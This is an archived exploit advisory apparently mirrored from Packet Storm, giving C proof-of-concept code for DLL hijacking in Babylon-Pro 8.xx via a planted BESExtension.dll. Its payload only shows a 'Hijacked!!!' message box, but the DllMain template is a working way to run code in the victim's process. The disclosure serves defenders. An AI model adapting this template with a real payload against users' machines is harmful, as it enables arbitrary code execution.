Lucene search
K

Babylon-Pro 8.xx DLL Hijacking

🗓️ 23 Nov 2010 00:00:00Reported by LocuType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Babylon-Pro 8.xx DLL Hijacking exploit on Windows 7 and XP

Code
`/*============ { Advisory 22/11/2010 } =============  
  
Exploit Title: Babylon-Pro 8.xx DLL Hijacking Exploit (BESExtension.dll)  
Software Link:: http://www.babylon.com  
Tested on: Windows 7 x32 and Windows xp sp3 x32  
*/  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
  
exploit();  
  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
return TRUE;  
}  
  
int exploit()  
{  
MessageBox(0, "Hijacked!!!", "DLL Message", MB_OK);  
}  
/*  
Credits:  
# Discoverd By: Locu  
# Website: http://xlocux.wordpress.com  
# Contacts: xlocux[-at-]gmail.com  
*/  
================== { EOF } =====================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation